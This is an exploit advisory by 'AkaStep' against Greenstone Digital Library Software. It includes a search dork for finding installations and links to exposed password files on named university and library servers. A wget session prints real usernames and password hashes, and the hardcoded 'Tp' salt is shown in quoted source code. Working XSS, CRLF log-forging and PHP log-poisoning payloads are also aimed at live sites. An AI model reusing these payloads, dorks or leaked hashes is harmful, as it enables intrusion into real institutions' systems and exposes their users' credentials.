Greenstone multiple vulnerabilities

1. ========================================================================
2. Vulnerable Software: Greenstone Digital Library Software.
3. Official Site: http://www.greenstone.org/
4. Dork: inurl:gsdl/etc/
5.  
6. ==========================================================================
7. About software:
8.  
9. The aim of the Greenstone software is to empower users,
10. particularly in universities, libraries,
11. and other public service institutions,
12. to build their own digital libraries.
13. Digital libraries are radically reforming how information
14. is disseminated and acquired in UNESCO's partner communities
15. and institutions in the fields of education, science
16. and culture around the world, and particularly in developing countries.
17. ==========================================================================
18. About Vulnerabilities.
19.  
20.  
21.  
22. This software: is prone to multiple vulnerabilities such as:
23.  
24. [*] Password file Disclosure,
25. [*] Cross Site Scripting,
26. [*] Log File forging,Log File poisoning,
27. [*] Default salt,
28. [*] Unrestricted access to system/configuration files.
29. (As well as to passwords file as mentinoned above.)
30.  
31. =================Let's Roll============================
32.  
33.  
34. Password file disclosure:
35.  
36. http://greenstone.flib.sci.am/gsdl/etc/users.gdb
37. http://greenstone.flib.sci.am/gsdl/etc/key.gdb
38. http://greenstone.martinique.univ-ag.fr/gsdl/etc/users.db
39. http://greenstone.martinique.univ-ag.fr/gsdl/etc/key.db
40.  
41. Example:
42. (P.S Password encryption: Des (Unix))
43. ===================== Reproduce =====================
44. $ wget http://greenstone.flib.sci.am/gsdl/etc/users.gdb && cat users.gdb
45. --2012-11-22 17:04:39-- http://greenstone.flib.sci.am/gsdl/etc/users.gdb
46. Resolving greenstone.flib.sci.am (greenstone.flib.sci.am)... 93.187.162.197
47. Connecting to greenstone.flib.sci.am (greenstone.flib.sci.am)|93.187.162.197|:80... connected.
48. HTTP request sent, awaiting response... 200 OK
49. Length: 12926 (13K) [text/plain]
50. Saving to: `users.gdb'
51.  
52. 100%[==========================================>] 12,926 31.8K/s in 0.4s
53.  
54. 2012-11-22 17:04:40 (31.8 KB/s) - `users.gdb' saved [12926/12926]
55. .......Some junk snip........
56. ▒▒▒ admin<comment>created at install time
57. <enabled>true
58. <groups>administrator,colbuilder,all-collections-editor
59. <password>TpM5gyFpfCsLc
60. <username>admindemo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
61. <enabled>true
62. <groups>demo
63. <password>Tpp90HTz/jz9w
64. <username>demotatevik<comment>
65. <enabled>true
66. <groups>all-collections-editor
67. <password>Tpyq8s1oUIioc
68. <username>tatevik
69. azgayin<comment>
70. <enabled>true
71. <groups>all-collections-editor
72. <password>Tp53Vsj1qM4cE
73. <username>azgayin
74. demo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
75. <enabled>true
76. <groups>demo
77. <password>TpzWMQXVfKFvw
78. <username>demo
79.  
80. ========================= END OF users.gbd============================
81.  
82.  
83. Known salt issuse (because this application uses "setpasswd" utility via
84. hardcoded salt=>: Tp)
85. (Especially on windows systems)
86.  
87.  
88.  
89. ================================BEGIN================================
90. /**********************************************************************
91. *
92. * setpasswd.cpp --
93. * Copyright (C) 2000 The New Zealand Digital Library Project
94. *
95. * A component of the Greenstone digital library software
96. * from the New Zealand Digital Library Project at the
97. * University of Waikato, New Zealand.
98. *
99. * This program is free software; you can redistribute it and/or modify
100. * it under the terms of the GNU General Public License as published by
101. * the Free Software Foundation; either version 2 of the License, or
102. * (at your option) any later version.
103. *
104. * This program is distributed in the hope that it will be useful,
105. * but WITHOUT ANY WARRANTY; without even the implied warranty of
106. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
107. * GNU General Public License for more details.
108. *
109. * You should have received a copy of the GNU General Public License
110. * along with this program; if not, write to the Free Software
111. * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
112. *
113. *********************************************************************/
114.  
115. // setpasswd is a windows application that can be used to encrypt a password
116. // and write it (along with its corresponding username) to a gdbm database.
117.  
118. // it handles writing to the gdbm database itself to avoid having to call
119. // the txt2db console application (and therefore avoiding the console
120. // window popping up when called from another windows application).
121.  
122. // note that setpasswd does no checking to make sure that any of it's
123. // input arguments are valid (or even reasonable) values.
124.  
125. // this program should be compiled into a binary called setpw.exe (to be
126. // short enough not to mess with 16 bit Windows platforms).
127.  
128. // usage:
129. // setpw -u username -p password -o output_gdbm_file
130.  
131. #include "text_t.h"
132. #include "crypt.h"
133. #include "autoconf.h"
134. #include "systems.h"
135. #include "gdbmconst.h"
136. #include "gdbm.h"
137.  
138. #include <windows.h>
139.  
140. text_t username;
141. text_t password;
142. text_t output_gdbm_file;
143.  
144. bool parse_cmdline (LPSTR cmdline) {
145.  
146. bool in_quote = false;
147. text_t arg;
148. text_tarray args;
149. unsigned char *c = (unsigned char *)cmdline;
150. while (*c != '\0') {
151. if (*c == '"') {
152. if (!in_quote) {
153. in_quote = true;
154. } else {
155. in_quote = false;
156. if (!arg.empty()) args.push_back (arg);
157. arg.clear();
158. }
159. } else if (*c == ' ' && !in_quote) {
160. if (!arg.empty()) args.push_back (arg);
161. arg.clear();
162. } else {
163. arg.push_back (*c);
164. }
165. ++c;
166. }
167. if (!arg.empty()) args.push_back (arg);
168.  
169. text_tarray::const_iterator here = args.begin();
170. text_tarray::const_iterator end = args.end();
171. while (here != end) {
172. if (*here == "-u" && (++here != end)) username = *here;
173. else if (*here == "-p" && (++here != end)) password = *here;
174. else if (*here == "-o" && (++here != end)) output_gdbm_file = *here;
175. if (here != end) ++here;
176. }
177. if (username.empty() || password.empty() || output_gdbm_file.empty()) {
178. MessageBox (NULL, "Usage:\n setpasswd -u username -p password -o output_gdbm_file",
179. "setpasswd failed", MB_OK);
180. return false;
181. }
182. return true;
183. }
184.  
185. text_t crypt_text (const text_t &text) {
186. static const char *salt = "Tp";
187. text_t crypt_password;
188.  
189. if (text.empty()) return "";
190.  
191. // encrypt the password
192. char *text_cstr = text.getcstr();
193. if (text_cstr == NULL) return "";
194. crypt_password = crypt(text_cstr, salt);
195. delete []text_cstr;
196.  
197. return crypt_password;
198. }
199.  
200. bool add_to_db () {
201.  
202. int block_size = 0;
203. GDBM_FILE dbf;
204. char *dbname = output_gdbm_file.getcstr();
205.  
206. // open the database
207. int read_write = GDBM_WRCREAT;
208. dbf = gdbm_open (dbname, block_size, read_write, 00664, NULL, 1);
209. if (dbf == NULL) {
210. MessageBox (NULL, "gdbm_open failed\n", "setpasswd", MB_OK);
211. return false;
212. }
213.  
214. datum key_data;
215. key_data.dptr = username.getcstr();
216. if (key_data.dptr == NULL) {
217. MessageBox (NULL, "null key_data\n", "setpasswd", MB_OK);
218. return false;
219. }
220. key_data.dsize = strlen(key_data.dptr);
221.  
222. text_t value = "<comment>\n";
223. value += "<enabled>true\n";
224. value += "<groups>administrator,colbuilder\n";
225. value += "<password>" + password + "\n";
226. value += "<username>" + username + "\n";
227.  
228. datum value_data;
229. value_data.dptr = value.getcstr();
230. if (value_data.dptr == NULL) {
231. MessageBox (NULL, "null value_data\n", "setpasswd", MB_OK);
232. return false;
233. }
234. value_data.dsize = strlen(value_data.dptr);
235.  
236. // store the value
237. if (gdbm_store (dbf, key_data, value_data, GDBM_REPLACE) < 0) {
238. MessageBox (NULL, "gdbm_store failed\n", "setpasswd", MB_OK);
239. return false;
240. }
241. gdbm_close (dbf);
242.  
243. delete []key_data.dptr;
244. delete []value_data.dptr;
245. delete []dbname;
246. return true;
247. }
248.  
249. int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
250. LPSTR lpCmdLine, int nCmdShow) {
251.  
252. // parse command line arguments
253. if (!parse_cmdline (lpCmdLine)) return 1;
254.  
255. // encrypt the password
256. password = crypt_text (password);
257.  
258. // append the password and username to database
259. add_to_db();
260.  
261. return 0;
262. }
263.  
264. ============================================================
265.  
266. XSS:
267.  
268. site.tld/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=<script>alert("OwnEd");</script>
269. Demo:
270. http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E
271.  
272. http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E%20%3E%3E%20greenstone.flib.greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E
273.  
274. http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=%22%3E%3Cscript%3Ealert%28%22Again%20Owned%22%29;%3C/script%3E&pr=7&c=AkaStep
275.  
276.  
277. ============================================================
278.  
279.  
280.  
281. Log forging:
282.  
283. http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223"%0D%0A%0D%0AWarning: Accepted connection from unknown host to local port: 22 root logged in%29%0D%0A%0D%0A" cmd.exe
284.  
285.  
286. http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223%0D%0A%0D%0AError%20D:\Program%20Files\Greenstone\%20directory%20owned?%29%0D%0A%0D%0A
287.  
288.  
289. Forged log: http://greenstone.unam.na/gsdl/etc/error.txt (CTRL+F and search for: host to local port: 22)
290.  
291. Example:
292.  
293. ===================EXAMPLE OF =FORGED LOG====================
294. Error: the action "4?e="3"
295.  
296.  
297.  
298. Warning: Accepted connection from unknown host to local port: 22 root logged in) <==Fake entry for Panic system administrator))))))
299.  
300.  
301.  
302. " cmd.exe" could not be found.
303.  
304. ================END OF FORGED LOG=============
305.  
306. Log File Poisoning: (Usefull for LFI)
307. www.bibliotecamuseodelamemoria.cl/gsdl/cgi-bin/library.cgi?e=4?e="%0d%0a<?php phpinfo();?>%0d%0a%00%00
308.  
309. Poisoned Log can be found in the following places:
310. site/gsdl/etc/error.txt
311. or
312. site/etc/error.txt (<=On Windows systems in ex i found it here)
313.  
314.  
315.  
316.  
317. Example of injected log:
318. ==================================
319.  
320. http://greenstone.unam.na/gsdl/etc/error.txt
321.  
322.  
323. Error: the action "4?e="
324.  
325. <?php phpinfo();?>
326.  
327. ��" could not be found.
328. ==================================
329.  
330. ******************** The End *******************
331.  
332. ================================================
333. SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
334. ================================================
335. packetstormsecurity.org
336. packetstormsecurity.com
337. packetstormsecurity.net
338. securityfocus.com
339. cxsecurity.com
340. security.nnov.ru
341. securtiyvulns.com
342. securitylab.ru
343. secunia.com
344. securityhome.eu
345. exploitsdownload.com
346. exploit-db.com
347. osvdb.com
348. websecurity.com.ua
349.  
350. to all Aa Team + to all Azerbaijan Black HatZ
351. + *Especially to my bro CAMOUFL4G3 *
352. To All Turkish Hackers
353.  
354. Also special thanks to: ottoman38 & HERO_AZE
355. ================================================
356.  
357. /AkaStep